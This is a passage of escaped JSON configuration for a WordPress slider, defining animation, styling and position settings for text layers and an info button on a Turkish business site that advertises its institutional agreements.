ayer-selectable\":\"default\",\"version\":\"530\",\"frames\":{\"frame_0\":{\"time\":600,\"delay\":0,\"split\":\"none\",\"split_extratime\":0,\"splitdelay\":\"10\",\"speed\":400,\"animation\":\"sfb\",\"easing\":\"Power4.easeOut\",\"time_relative\":600,\"text_c\":\"transparent\",\"bg_c\":\"transparent\",\"use_text_c\":false,\"use_bg_c\":false,\"split_direction\":\"forward\",\"sfxcolor\":\"#ffffff\",\"sfx_effect\":\"\"},\"frame_999\":{\"time\":4870,\"delay\":0,\"split\":\"none\",\"split_extratime\":0,\"splitdelay\":\"10\",\"speed\":300,\"animation\":\"auto\",\"easing\":\"nothing\",\"time_relative\":3870,\"split_direction\":\"forward\",\"sfxcolor\":\"#ffffff\",\"use_text_c\":false,\"use_bg_c\":false,\"text_c\":\"transparent\",\"bg_c\":\"transparent\",\"sfx_effect\":\"\"}},\"isDemo\":false,\"layer_bg_position\":\"center center\",\"layer_bg_size\":\"cover\",\"layer_bg_repeat\":\"no-repeat\",\"layer_blend_mode\":\"normal\",\"force_hover\":true,\"mask_speed_start\":\"inherit\",\"mask_ease_start\":\"inherit\",\"min_height\":\"40px\",\"display\":\"block\",\"link\":\"\",\"link_open_in\":\"same\",\"css-position\":\"relative\",\"margin\":{\"desktop\":[\"0\",\"0\",\"0\",\"0\"],\"notebook\":[\"0\",\"0\",\"0\",\"0\"]},\"padding\":{\"desktop\":[\"0\",\"0\",\"0\",\"0\"],\"notebook\":[\"0\",\"0\",\"0\",\"0\"]},\"text-align\":{\"desktop\":\"center\",\"notebook\":\"center\"},\"pers_start\":\"inherit\",\"pers_end\":\"inherit\",\"svg\":{\"svgstroke-color\":\"transparent\",\"svgstroke-dasharray\":\"0\",\"svgstroke-dashoffset\":\"0\",\"svgstroke-width\":\"0\",\"svgstroke-hover-color\":\"transparent\",\"svgstroke-hover-dasharray\":\"0\",\"svgstroke-hover-dashoffset\":\"0\",\"svgstroke-hover-width\":\"0\"},\"p_uid\":-1,\"toggle_inverse_content\":false,\"displaymode\":true,\"attrWrapperID\":\"\",\"attrWrapperClasses\":\"\",\"column_break_at\":\"mobile\",\"zIndex\":6,\"positionLeftReset\":70,\"addedToStage\":true,\"blurfilter_start\":\"0\",\"blurfilter_end\":\"0\",\"grayscalefilter_start\":\"0\",\"grayscalefilter_end\":\"0\",\"attrTabindex\":\"\",\"link_follow\":\"follow\",\"brightnessfilter_start\":\"100\",\"brightnessfilter_end\":\"100\",\"layer_action\":{\"tooltip_event\":[],\"action\":[],\"image_link\":[],\"link_open_in\":[],\"link_follow\":[],\"jump_to_slide\":[],\"scrollunder_offset\":[],\"action_easing\":[],\"action_speed\":[],\"actioncallback\":[],\"layer_target\":[],\"link_type\":[],\"action_delay\":[],\"toggle_layer_type\":[],\"toggle_class\":[]}},{\"text\":\" T.C. Z\\u0130RAAT BANKASI,  T.B.M.M. gibi <br>Bir\\u00e7ok firma ve kurum ile\\n<br>anla\\u015fmalar\\u0131m\\u0131z vard\\u0131r.\",\"type\":\"text\",\"left\":{\"desktop\":19,\"notebook\":35},\"top\":{\"desktop\":187,\"notebook\":217},\"align_hor\":{\"desktop\":\"left\",\"notebook\":\"left\"},\"align_vert\":{\"desktop\":\"top\",\"notebook\":\"top\"},\"hiddenunder\":false,\"resizeme\":true,\"link_slide\":\"nothing\",\"scrollunder_offset\":\"\",\"style\":\"\",\"corner_left\":\"nothing\",\"corner_right\":\"nothing\",\"width\":392,\"height\":112,\"serial\":2,\"timeLast\":3600,\"alt\":\"\",\"scaleX\":{\"desktop\":\"\",\"notebook\":\"\"},\"scaleY\":{\"desktop\":\"\",\"notebook\":\"\"},\"scaleProportional\":false,\"attrID\":\"\",\"attrClasses\":\"\",\"attrTitle\":\"\",\"attrRel\":\"\",\"x_start\":\"inherit\",\"x_end\":\"inherit\",\"y_start\":\"50px\",\"y_end\":\"inherit\",\"z_start\":\"inherit\",\"z_end\":\"inherit\",\"x_rotate_start\":\"inherit\",\"x_rotate_end\":\"inherit\",\"y_rotate_start\":\"inherit\",\"y_rotate_end\":\"inherit\",\"z_rotate_start\":\"inherit\",\"z_rotate_end\":\"inherit\",\"scale_x_start\":\"inherit\",\"scale_x_end\":\"inherit\",\"scale_y_start\":\"inherit\",\"scale_y_end\":\"inherit\",\"skew_x_start\":\"inherit\",\"skew_x_end\":\"inherit\",\"skew_y_start\":\"inherit\",\"skew_y_end\":\"inherit\",\"opacity_start\":\"0\",\"opacity_end\":\"inherit\",\"deformation\":{\"font-family\":\"\",\"padding\":[\"0\",\"0\",\"0\",\"0\"],\"background-color\":\"transparent\",\"font-style\":\"normal\",\"text-decoration\":\"none\",\"text-align\":\"left\",\"border-color\":\"transparent\",\"border-style\":\"none\",\"border-width\":[\"0\",\"0\",\"0\",\"0\"],\"border-radius\":[\"0\",\"0\",\"0\",\"0\"],\"x\":0,\"y\":0,\"z\":0,\"skewx\":\"0\",\"skewy\":\"0\",\"scalex\":\"1\",\"scaley\":\"1\",\"opacity\":\"1\",\"xrotate\":0,\"yrotate\":0,\"2d_origin_x\":\"50\",\"2d_origin_y\":\"50\",\"pers\":\"600\",\"corner_left\":\"nothing\",\"corner_right\":\"nothing\",\"text-transform\":\"none\",\"overflow\":\"visible\",\"parallax\":\"5\",\"blurfilter\":\"0\",\"grayscalefilter\":\"0\",\"vertical-align\":\"top\",\"brightnessfilter\":\"100\"},\"inline\":[],\"deformation-hover\":{\"color\":\"rgba(255, 255, 255, 1)\",\"text-decoration\":\"none\",\"background-color\":\"transparent\",\"border-color\":\"transparent\",\"border-style\":\"none\",\"border-width\":[\"0\",\"0\",\"0\",\"0\"],\"border-radius\":[\"0\",\"0\",\"0\",\"0\"],\"x\":0,\"y\":0,\"z\":0,\"skewx\":\"0\",\"skewy\":\"0\",\"scalex\":\"1\",\"scaley\":\"1\",\"opacity\":\"1\",\"xrotate\":0,\"yrotate\":0,\"2d_rotation\":0,\"2d_origin_x\":50,\"2d_origin_y\":50,\"speed\":\"0\",\"easing\":\"Linear.easeNone\",\"css_cursor\":\"auto\",\"zindex\":\"auto\",\"blurfilter\":\"0\",\"grayscalefilter\":\"0\",\"brightnessfilter\":\"100\",\"pointer_events\":\"auto\"},\"static_styles\":{\"color\":{\"desktop\":\"rgba(255, 255, 255, 1)\",\"notebook\":\"rgba(255, 255, 255, 1)\"},\"font-weight\":{\"desktop\":\"300\",\"notebook\":\"300\"},\"font-size\":{\"desktop\":\"25px\",\"notebook\":\"25px\"},\"line-height\":{\"desktop\":\"28px\",\"notebook\":\"28px\"},\"font-family\":\"\\\"Noto Sans\\\"\",\"letter-spacing\":{\"desktop\":\"\",\"notebook\":\"\"}},\"subtype\":\"\",\"specialsettings\":[],\"internal_class\":\"\",\"hover\":false,\"alias\":\"Exceptional\",\"loop_animation\":\"none\",\"loop_easing\":\"\",\"loop_speed\":\"2\",\"loop_startdeg\":-20,\"loop_enddeg\":20,\"loop_xorigin\":50,\"loop_yorigin\":50,\"loop_xstart\":0,\"loop_xend\":0,\"loop_ystart\":0,\"loop_yend\":0,\"loop_zoomstart\":\"1\",\"loop_zoomend\":\"1\",\"loop_angle\":\"0\",\"loop_radius\":\"10\",\"html_tag\":\"h2\",\"mask_start\":false,\"mask_end\":false,\"x_start_reverse\":false,\"y_start_reverse\":false,\"x_end_reverse\":false,\"y_end_reverse\":false,\"x_rotate_start_reverse\":false,\"y_rotate_start_reverse\":false,\"z_rotate_start_reverse\":false,\"x_rotate_end_reverse\":false,\"y_rotate_end_reverse\":false,\"z_rotate_end_reverse\":false,\"scale_x_start_reverse\":false,\"scale_y_start_reverse\":false,\"scale_x_end_reverse\":false,\"scale_y_end_reverse\":false,\"skew_x_start_reverse\":false,\"skew_y_start_reverse\":false,\"skew_x_end_reverse\":false,\"skew_y_end_reverse\":false,\"mask_x_start_reverse\":false,\"mask_y_start_reverse\":false,\"mask_x_end_reverse\":false,\"mask_y_end_reverse\":false,\"mask_x_start\":\"0\",\"mask_y_start\":\"0\",\"mask_x_end\":\"0\",\"mask_y_end\":\"0\",\"mask_speed_end\":\"inherit\",\"mask_ease_end\":\"inherit\",\"alt_option\":\"media_library\",\"max_height\":{\"desktop\":\"auto\",\"notebook\":\"auto\"},\"max_width\":{\"desktop\":\"auto\",\"notebook\":\"auto\"},\"video_width\":{\"desktop\":\"480px\",\"notebook\":\"480px\"},\"video_height\":{\"desktop\":\"360px\",\"notebook\":\"360px\"},\"2d_rotation\":0,\"2d_origin_x\":50,\"2d_origin_y\":50,\"whitespace\":{\"desktop\":\"nowrap\",\"notebook\":\"nowrap\"},\"static_start\":\"1\",\"static_end\":\"last\",\"seo-optimized\":false,\"visible-desktop\":true,\"visible-notebook\":true,\"visible-tablet\":true,\"visible-mobile\":true,\"resize-full\":true,\"show-on-hover\":false,\"basealign\":\"grid\",\"responsive_offset\":true,\"lazy-load\":\"auto\",\"image-size\":\"auto\",\"cover_mode\":\"custom\",\"x_origin_start\":\"50\",\"y_origin_start\":\"50\",\"x_origin_end\":\"50\",\"y_origin_end\":\"50\",\"visible\":true,\"animation_overwrite\":\"wait\",\"trigger_memory\":\"keep\",\"endWithSlide\":false,\"unique_id\":1,\"toggle\":false,\"toggle_use_hover\":false,\"texttoggle\":\"\",\"autolinebreak\":false,\"layer-selectable\":\"default\",\"version\":\"530\",\"frames\":{\"frame_0\":{\"time\":800,\"delay\":0,\"split\":\"none\",\"split_extratime\":0,\"splitdelay\":\"10\",\"speed\":400,\"animation\":\"sfb\",\"easing\":\"Power4.easeOut\",\"time_relative\":800,\"text_c\":\"transparent\",\"bg_c\":\"transparent\",\"use_text_c\":false,\"use_bg_c\":false,\"split_direction\":\"forward\",\"sfxcolor\":\"#ffffff\",\"sfx_effect\":\"\"},\"frame_999\":{\"time\":4870,\"delay\":0,\"split\":\"none\",\"split_extratime\":0,\"splitdelay\":\"10\",\"speed\":300,\"animation\":\"auto\",\"easing\":\"nothing\",\"time_relative\":3670,\"split_direction\":\"forward\",\"sfxcolor\":\"#ffffff\",\"use_text_c\":false,\"use_bg_c\":false,\"text_c\":\"transparent\",\"bg_c\":\"transparent\",\"sfx_effect\":\"\"}},\"isDemo\":false,\"layer_bg_position\":\"center center\",\"layer_bg_size\":\"cover\",\"layer_bg_repeat\":\"no-repeat\",\"layer_blend_mode\":\"normal\",\"force_hover\":true,\"mask_speed_start\":\"inherit\",\"mask_ease_start\":\"inherit\",\"min_height\":\"40px\",\"display\":\"block\",\"link\":\"\",\"link_open_in\":\"same\",\"css-position\":\"relative\",\"margin\":{\"desktop\":[\"0\",\"0\",\"0\",\"0\"],\"notebook\":[\"0\",\"0\",\"0\",\"0\"]},\"padding\":{\"desktop\":[\"0\",\"0\",\"0\",\"0\"],\"notebook\":[\"0\",\"0\",\"0\",\"0\"]},\"text-align\":{\"desktop\":\"left\",\"notebook\":\"left\"},\"pers_start\":\"inherit\",\"pers_end\":\"inherit\",\"svg\":{\"svgstroke-color\":\"transparent\",\"svgstroke-dasharray\":\"0\",\"svgstroke-dashoffset\":\"0\",\"svgstroke-width\":\"0\",\"svgstroke-hover-color\":\"transparent\",\"svgstroke-hover-dasharray\":\"0\",\"svgstroke-hover-dashoffset\":\"0\",\"svgstroke-hover-width\":\"0\"},\"p_uid\":-1,\"toggle_inverse_content\":false,\"displaymode\":true,\"attrWrapperID\":\"\",\"attrWrapperClasses\":\"\",\"column_break_at\":\"mobile\",\"zIndex\":7,\"positionLeftReset\":90,\"addedToStage\":true,\"blurfilter_start\":\"0\",\"blurfilter_end\":\"0\",\"grayscalefilter_start\":\"0\",\"grayscalefilter_end\":\"0\",\"attrTabindex\":\"\",\"bgimage_url\":\"http:\\/\\/localhost\\/zedent\\/wp-content\\/\",\"link_follow\":\"follow\",\"brightnessfilter_start\":\"100\",\"brightnessfilter_end\":\"100\",\"layer_action\":{\"tooltip_event\":[],\"action\":[],\"image_link\":[],\"link_open_in\":[],\"link_follow\":[],\"jump_to_slide\":[],\"scrollunder_offset\":[],\"action_easing\":[],\"action_speed\":[],\"actioncallback\":[],\"layer_target\":[],\"link_type\":[],\"action_delay\":[],\"toggle_layer_type\":[],\"toggle_class\":[]}},{\"text\":\"[us_btn text=\\\"Bilgi Al\\\" color=\\\"primary\\\" link=\\\"url:\\/anlasmali-kurumlar|||\\\"]\",\"type\":\"text\",\"special_type\":null,\"version\":\"530\",\"frames\":{\"frame_0\":{\"time\":1000,\"delay\":0,\"split\":\"none\",\"splitdelay\":\"10\",\"split_extratime\":0,\"speed\":400,\"animation\":\"sfb\",\"easing\":\"Power4.easeOut\",\"time_relative\":1000,\"text_c\":\"transparent\",\"bg_c\":\"transparent\",\"use_text_c\":false,\"use_bg_c\":false,\"split_direction\":\"forward\",\"sfxcolor\":\"#ffffff\",\"sfx_effect\":\"\"},\"frame_999\":{\"time\":4870,\"delay\":0,\"split\":\"none\",\"splitdelay\":\"10\",\"split_extratime\":0,\"speed\":300,\"animation\":\"auto\",\"easing\":\"nothing\",\"time_relative\":3470,\"split_direction\":\"forward\",\"sfxcolor\":\"#ffffff\",\"use_text_c\":false,\"use_bg_c\":false,\"text_c\":\"transparent\",\"bg_c\":\"transparent\",\"sfx_effect\":\"\"}},\"subtype\":\"\",\"specialsettings\":[],\"unique_id\":3,\"left\":{\"desktop\":21,\"notebook\":37},\"top\":{\"desktop\":309,\"notebook\":353},\"isDemo\":false,\"internal_class\":\"\",\"hover\":false,\"alias\":\"Button 1\",\"layer_bg_position\":\"center center\",\"layer_bg_size\":\"cover\",\"layer_bg_repeat\":\"no-repeat\",\"loop_animation\":\"none\",\"loop_easing\":\"\",\"loop_speed\":\"2\",\"loop_startdeg\":-20,\"loop_enddeg\":20,\"loop_xorigin\":50,\"loop_yorigin\":50,\"loop_xstart\":0,\"loop_xend\":0,\"loop_ystart\":0,\"loop_yend\":0,\"loop_zoomstart\":\"1\",\"loop_zoomend\":\"1\",\"loop_angle\":\"0\",\"loop_radius\":\"10\",\"layer_blend_mode\":\"normal\",\"html_tag\":\"div\",\"mask_start\":false,\"mask_end\":false,\"force_hover\":true,\"x_start_reverse\":false,\"y_start_reverse\":false,\"x_end_reverse\":false,\"y_end_reverse\":false,\"x_rotate_start_reverse\":false,\"y_rotate_start_reverse\":false,\"z_rotate_start_reverse\":false,\"x_rotate_end_reverse\":false,\"y_rotate_end_reverse\":false,\"z_rotate_end_reverse\":false,\"scale_x_start_reverse\":false,\"scale_y_start_reverse\":false,\"scale_x_end_reverse\":false,\"scale_y_end_reverse\":false,\"skew_x_start_reverse\":false,\"skew_y_start_reverse\":false,\"skew_x_end_reverse\":false,\"skew_y_end_reverse\":false,\"mask_x_start_reverse\":false,\"mask_y_start_reverse\":false,\"mask_x_end_reverse\":false,\"mask_y_end_reverse\":false,\"mask_x_start\":\"0\",\"mask_y_start\":\"0\",\"mask_speed_start\":\"inherit\",\"mask_ease_start\":\"inherit\",\"mask_x_end\":\"0\",\"mask_y_end\":\"0\",\"mask_speed_end\":\"inherit\",\"mask_ease_end\":\"inherit\",\"alt_option\":\"media_library\",\"alt\":\"\",\"max_height\":{\"desktop\":\"auto\",\"notebook\":\"auto\"},\"min_height\":\"40px\",\"max_width\":{\"desktop\":\"auto\",\"notebook\":\"auto\"},\"video_width\":{\"desktop\":\"480px\",\"notebook\":\"480px\"},\"video_height\":{\"desktop\":\"360px\",\"notebook\":\"360px\"},\"2d_rotation\":0,\"2d_origin_x\":50,\"2d_origin_y\":50,\"whitespace\":{\"desktop\":\"nowrap\",\"notebook\":\"nowrap\"},\"display\":\"block\",\"static_start\":\"1\",\"static_end\":\"last\",\"align_hor\":{\"desktop\":\"left\",\"notebook\":\"left\"},\"align_vert\":{\"desktop\":\"top\",\"notebook\":\"top\"},\"hiddenunder\":false,\"resizeme\":false,\"seo-optimized\":false,\"link\":\"\",\"link_open_in\":\"same\",\"link_slide\":\"nothing\",\"scrollunder_offset\":\"\",\"style\":\"\",\"visible-desktop\":true,\"visible-notebook\":true,\"visible-tablet\":true,\"visible-mobile\":false,\"resize-full\":false,\"show-on-hover\":false,\"basealign\":\"grid\",\"responsive_offset\":true,\"lazy-load\":\"auto\",\"image-size\":\"auto\",\"css-position\":\"relative\",\"width\":691,\"height\":20,\"cover_mode\":\"custom\",\"static_styles\":{\"font-size\":{\"desktop\":\"16px\",\"notebook\":\"16px\"},\"line-height\":{\"desktop\":\"20px\",\"notebook\":\"20px\"},\"font-weight\":{\"desktop\":\"400\",\"notebook\":\"400\"},\"color\":{\"desktop\":\"rgba(255, 255, 255, 1)\",\"notebook\":\"rgba(255, 255, 255, 1)\"},\"letter-spacing\":{\"desktop\":\"\",\"notebook\":\"\"}},\"margin\":{\"desktop\":[\"0\",\"0\",\"0\",\"0\"],\"notebook\":[\"0\",\"0\",\"0\",\"0\"]},\"padding\":{\"desktop\":[\"0\",\"0\",\"0\",\"0\"],\"notebook\":[\"0\",\"0\",\"0\",\"0\"]},\"text-align\":{\"desktop\":\"inherit\",\"notebook\":\"inherit\"},\"x_start\":\"inherit\",\"y_start\":\"50px\",\"z_start\":\"inherit\",\"x_end\":\"inherit\",\"y_end\":\"inherit\",\"z_end\":\"inherit\",\"opacity_start\":\"0\",\"opacity_end\":\"0\",\"x_rotate_start\":\"inherit\",\"y_rotate_start\":\"inherit\",\"z_rotate_start\":\"inherit\",\"x_rotate_end\":\"inherit\",\"y_rotate_end\":\"inherit\",\"z_rotate_end\":\"inherit\",\"scale_x_start\":\"inherit\",\"scale_y_start\":\"inherit\",\"scale_x_end\":\"inherit\",\"scale_y_end\":\"inherit\",\"skew_x_start\":\"inherit\",\"skew_y_start\":\"inherit\",\"skew_x_end\":\"inherit\",\"skew_y_end\":\"inherit\",\"pers_start\":\"inherit\",\"pers_end\":\"inherit\",\"deformation\":{\"font-family\":\"\",\"font-style\":\"normal\",\"text-decoration\":\"none\",\"text-transform\":\"none\",\"background-color\":\"transparent\",\"border-color\":\"transparent\",\"border-style\":\"none\",\"border-width\":[\"0\",\"0\",\"0\",\"0\"],\"border-radius\":[\"0\",\"0\",\"0\",\"0\"],\"x\":0,\"y\":0,\"z\":0,\"skewx\":\"0\",\"skewy\":\"0\",\"scalex\":\"1\",\"scaley\":\"1\",\"opacity\":\"1\",\"xrotate\":0,\"yrotate\":0,\"2d_origin_x\":\"50\",\"2d_origin_y\":\"50\",\"pers\":\"600\",\"corner_left\":\"nothing\",\"corner_right\":\"nothing\",\"overflow\":\"visible\",\"parallax\":\"5\",\"blurfilter\":\"0\",\"grayscalefilter\":\"0\",\"vertical-align\":\"top\",\"brightnessfilter\":\"100\"},\"svg\":{\"svgstroke-color\":\"transparent\",\"svgstroke-dasharray\":\"0\",\"svgstroke-dashoffset\":\"0\",\"svgstroke-width\":\"0\",\"svgstroke-hover-color\":\"transparent\",\"svgstroke-hover-dasharray\":\"0\",\"svgstroke-hover-dashoffset\":\"0\",\"svgstroke-hover-width\":\"0\"},\"deformation-hover\":{\"color\":\"rgba(0, 0, 0, 1)\",\"text-decoration\":\"none\",\"background-color\":\"transparent\",\"border-color\":\"transparent\",\"border-style\":\"none\",\"border-width\":[\"0px\",\"0px\",\"0px\",\"0px\"],\"border-radius\":[\"0px\",\"0px\",\"0px\",\"0px\"],\"x\":0,\"y\":0,\"z\":0,\"skewx\":\"0\",\"skewy\":\"0\",\"scalex\":\"1\",\"scaley\":\"1\",\"opacity\":\"1\",\"xrotate\":0,\"yrotate\":0,\"2d_rotation\":0,\"2d_origin_x\":50,\"2d_origin_y\":50,\"speed\":\"0\",\"zindex\":\"auto\",\"easing\":\"Linear.easeNone\",\"css_cursor\":\"auto\",\"blurfilter\":\"0\",\"grayscalefilter\":\"0\",\"brightnessfilter\":\"100\",\"pointer_events\":\"auto\"},\"visible\":true,\"animation_overwrite\":\"wait\",\"trigger_memory\":\"keep\",\"serial\":3,\"endWithSlide\":false,\"p_uid\":-1,\"toggle\":false,\"toggle_use_hover\":false,\"toggle_inverse_content\":false,\"texttoggle\":\"\",\"scaleX\":{\"desktop\":\"\",\"notebook\":\"\"},\"scaleY\":{\"desktop\":\"\",\"notebook\":\"\"},\"autolinebreak\":false,\"displaymode\":true,\"scaleProportional\":false,\"attrID\":\"\",\"attrWrapperID\":\"\",\"attrClasses\":\"\",\"attrWrapperClasses\":\"\",\"attrTitle\":\"\",\"attrRel\":\"\",\"layer-selectable\":\"default\",\"column_break_at\":\"mobile\",\"zIndex\":8,\"positionLeftReset\":110,\"addedToStage\":true,\"blurfilter_start\":\"0\",\"blurfilter_end\":\"0\",\"grayscalefilter_start\":\"0\",\"grayscalefilter_end\":\"0\",\"attrTabindex\":\"\",\"link_follow\":\"follow\",\"brightnessfilter_start\":\"100\",\"brightnessfilter_end\":\"100\",\"layer_action\":{\"tooltip_event\":[],\"action\":[],\"image_link\":[],\"link_open_in\":[],\"link_follow\":[],\"jump_to_slide\":[],\"scrollunder_offset\":[],\"action_easing\":[],\"action_speed\":[],\"actioncallback\":[],\"layer_target\":[],\"link_type\":[],\"action_delay\":[],\"toggle_layer_type\":[],\"toggle_class\":[]}},{\"text\":\"Kurumlar\",\"type\":\"text\",\"left\":{\"desktop\":17,\"notebook\":36},\"top\":{\"desktop\":122,\"notebook\":141},\"align_hor\":{\"desktop\":\"left\",\"notebook\":\"left\"},\"align_vert\":{\"desktop\":\"top\",\"notebook\":\"top\"},\"hiddenunder\":false,\"resizeme\":true,\"link_slide\":\"nothing\",\"scrollunder_offset\":\"\",\"style\":\"\",\"corner_left\":\"nothing\",\"corner_right\":\"nothing\",\"width\":306,\"height\":60,\"serial\":4,\"timeLast\":3600,\"alt\":\"\",\"scaleX\":{\"desktop\":\"\",\"notebook\":\"\"},\"scaleY\":{\"desktop\":\"\",\"notebook\":\"\"},\"scaleProportional\":false,\"attrID\":\"\",\"attrClasses\":\"\",\"attrTitle\":\"\",\"attrRel\":\"\",\"x_start\":\"inherit\",\"x_end\":\"inherit\",\"y_start\":\"50px\",\"y_end\":\"inherit\",\"z_start\":\"inherit\",\"z_end\":\"inherit\",\"x_rotate_start\":\"inherit\",\"x_rotate_end\":\"inherit\",\"y_rotate_start\":\"inherit\",\"y_rotate_end\":\"inherit\",\"z_rotate_start\":\"inherit\",\"z_rotate_end\":\"inherit\",\"scale_x_start\":\"inherit\",\"scale_x_end\":\"inherit\",\"scale_y_start\":\"inherit\",\"scale_y_end\":\"inherit\",\"skew_x_start\":\"inherit\",\"skew_x_end\":\"inherit\",\"skew_y_start\":\"inherit\",\"skew_y_end\":\"inherit\",\"opacity_start\":\"0\",\"opacity_end\":\"inherit\",\"deformation\":{\"font-family\":\"\",\"padding\":[\"0\",\"0\",\"0\",\"0\"],\"background-color\":\"transparent\",\"font-style\":\"normal\",\"text-decoration\":\"none\",\"text-align\":\"left\",\"border-color\":\"transparent\",\"border-style\":\"none\",\"border-width\":[\"0\",\"0\",\"0\",\"0\"],\"border-radius\":[\"0px\",\"0px\",\"0px\",\"0px\"],\"x\":0,\"y\":0,\"z\":0,\"skewx\":\"0\",\"skewy\":\"0\",\"scalex\":\"1\",\"scaley\":\"1\",\"opacity\":\"1\",\"xrotate\":0,\"yrotate\":0,\"2d_origin_x\":\"50\",\"2d_origin_y\":\"50\",\"pers\":\"600\",\"corner_left\":\"nothing\",\"corner_right\":\"nothing\",\"text-transform\":\"none\",\"overflow\":\"visible\",\"parallax\":\"5\",\"blurfilter\":\"0\",\"grayscalefilter\":\"0\",\"vertical-align\":\"top\",\"brightnessfilter\":\"100\"},\"inline\":[],\"deformation-hover\":{\"color\":\"rgba(0, 0, 0, 1)\",\"text-decoration\":\"none\",\"background-color\":\"transparent\",\"border-color\":\"transparent\",\"border-style\":\"none\",\"border-width\":[\"0\",\"0\",\"0\",\"0\"],\"border-radius\":[\"0px\",\"0px\",\"0px\",\"0px\"],\"x\":0,\"y\":0,\"z\":0,\"skewx\":\"0\",\"skewy\":\"0\",\"scalex\":\"1\",\"scaley\":\"1\",\"opacity\":\"1\",\"xrotate\":0,\"yrotate\":0,\"2d_rotation\":0,\"2d_origin_x\":50,\"2d_origin_y\":50,\"speed\":\"0\",\"easing\":\"Linear.easeNone\",\"css_cursor\":\"auto\",\"zindex\":\"auto\",\"blurfilter\":\"0\",\"grayscalefilter\":\"0\",\"brightnessfilter\":\"100\",\"pointer_events\":\"auto\"},\"static_styles\":{\"color\":{\"desktop\":\"rgba(255, 255, 255, 1)\",\"notebook\":\"rgba(255, 255, 255, 1)\"},\"font-weight\":{\"desktop\":\"600\",\"notebook\":\"600\"},\"font-size\":{\"desktop\":\"40px\",\"notebook\":\"40px\"},\"line-height\":{\"desktop\":\"60px\",\"notebook\":\"60px\"},\"font-family\":\"\\\"Noto Sans\\\"\",\"letter-spacing\":{\"desktop\":\"\",\"notebook\":\"\"}},\"subtype\":\"\",\"specialsettings\":[],\"internal_class\":\"\",\"hover\":false,\"alias\":\"Limitless\",\"loop_animation\":\"none\",\"loop_easing\":\"\",\"loop_speed\":\"2\",\"loop_startdeg\":-20,\"loop_enddeg\":20,\"loop_xorigin\":50,\"loop_yorigin\":50,\"loop_xstart\":0,\"loop_xend\":0,\"loop_ystart\":0,\"loop_yend\":0,\"loop_zoomstart\":\"1\",\"loop_zoomend\":\"1\",\"loop_angle\":\"0\",\"loop_radius\":\"10\",\"html_tag\":\"h2\",\"mask_start\":false,\"mask_end\":false,\"x_start_reverse\":false,\"y_start_reverse\":false,\"x_end_reverse\":false,\"y_end_reverse\":false,\"x_rotate_start_reverse\":false,\"y_rotate_start_reverse\":false,\"z_rotate_start_reverse\":false,\"x_rotate_end_reverse\":false,\"y_rotate_end_reverse\":false,\"z_rotate_end_reverse\":false,\"scale_x_start_reverse\":false,\"scale_y_start_reverse\":false,\"scale_x_end_reverse\":false,\"scale_y_end_reverse\":false,\"skew_x_start_reverse\":false,\"skew_y_start_reverse\":false,\"skew_x_end_reverse\":false,\"skew_y_end_reverse\":false,\"mask_x_start_reverse\":false,\"mask_y_start_reverse\":false,\"mask_x_end_reverse\":false,\"mask_y_end_reverse\":false,\"mask_x_start\":\"0\",\"mask_y_start\":\"0\",\"mask_x_end\":\"0\",\"mask_y_end\":\"0\",\"mask_speed_end\":\"inherit\",\"mask_ease_end\":\"inherit\",\"alt_option\":\"media_library\",\"max_height\":{\"desktop\":\"auto\",\"notebook\":\"auto\"},\"max_width\":{\"desktop\":\"auto\",\"notebook\":\"auto\"},\"video_width\":{\"desktop\":\"480px\",\"notebook\":\"480px\"},\"video_height\":{\"desktop\":\"360px\",\"notebook\":\"360px\"},\"2d_rotation\":0,\"2d_origin_x\":50,\"2d_origin_y\":50,\"whitespace\":{\"desktop\":\"nowrap\",\"notebook\":\"nowrap\"},\"static_start\":\"1\",\"static_end\":\"last\",\"seo-optimized\":false,\"visible-desktop\":true,\"visible-notebook\":true,\"visible-tablet\":true,\"visible-mobile\":true,\"resize-full\":true,\"show-on-hover\":false,\"basealign\":\"grid\",\"responsive_offset\":true,\"lazy-load\":\"auto\",\"image-size\":\"auto\",\"cover_mode\":\"custom\",\"x_origin_start\":\"50\",\"y_origin_start\":\"50\",\"x_origin_end\":\"50\",\"y_origin_end\":\"50\",\"visible\":true,\"animation_overwrite\":\"wait\",\"trigger_memory\":\"keep\",\"endWithSlide\":false,\"unique_id\":7,\"toggle\":false,\"toggle_use_hover\":false,\"texttoggle\":\"\",\"autolinebreak\":false,\"layer-selectable\":\"default\",\"version\":\"530\",\"frames\":{\"frame_0\":{\"time\":600,\"delay\":0,\"split\":\"none\",\"split_extratime\":0,\"splitdelay\":\"10\",\"speed\":400,\"animation\":\"sfb\",\"easing\":\"Power4.easeOut\",\"time_relative\":600,\"text_c\":\"transparent\",\"bg_c\":\"transparent\",\"use_text_c\":false,\"use_bg_c\":false,\"split_direction\":\"forward\",\"sfxcolor\":\"#ffffff\",\"sfx_effect\":\"\"},\"frame_999\":{\"time\":4870,\"delay\":0,\"split\":\"none\",\"split_extratime\":0,\"splitdelay\":\"10\",\"speed\":300,\"animation\":\"auto\",\"easing\":\"nothing\",\"time_relative\":3870,\"split_direction\":\"forward\",\"sfxcolor\":\"#ffffff\",\"use_text_c\":false,\"use_bg_c\":false,\"text_c\":\"transparent\",\"bg_c\":\"transparent\",\"sfx_effect\":\"\"}},\"isDemo\":false,\"layer_bg_position\":\"center center\",\"layer_bg_size\":\"cover\",\"layer_bg_repeat\":\"no-repeat\",\"layer_blend_mode\":\"normal\",\"force_hover\":true,\"mask_speed_start\":\"inherit\",\"mask_ease_start\":\"inherit\",\"min_height\":\"40px\",\"display\":\"block\",\"link\":\"\",\"link_open_in\":\"same\",\"css-position\":\"relative\",\"margin\":{\"desktop\":[\"0\",\"0\",\"0\",\"0\"],\"notebook\":[\"0\",\"0\",\"0\",\"0\"]},\"padding\":{\"desktop\":[\"0\",\"0\",\"0\",\"0\"],\"notebook\":[\"0\",\"0\",\"0\",\"0\"]},\"text-align\":{\"desktop\":\"center\",\"notebook\":\"center\"},\"pers_start\":\"inherit\",\"pers_end\":\"inherit\",\"svg\":{\"svgstroke-color\":\"transparent\",\"svgstroke-dasharray\":\"0\",\"svgstroke-dashoffset\":\"0\",\"svgstroke-width\":\"0\",\"svgstroke-hover-color\":\"transparent\",\"svgstroke-hover-dasharray\":\"0\",\"svgstroke-hover-dashoffset\":\"0\",\"svgstroke-hover-width\":\"0\"},\"p_uid\":-1,\"toggle_inverse_content\":false,\"displaymode\":true,\"attrWrapperID\":\"\",\"attrWrapperClasses\":\"\",\"column_break_at\":\"mobile\",\"zIndex\":9,\"positionLeftReset\":70,\"addedToStage\":true,\"blurfilter_start\":\"0\",\"blurfilter_end\":\"0\",\"grayscalefilter_start\":\"0\",\"grayscalefilter_end\":\"0\",\"attrTabind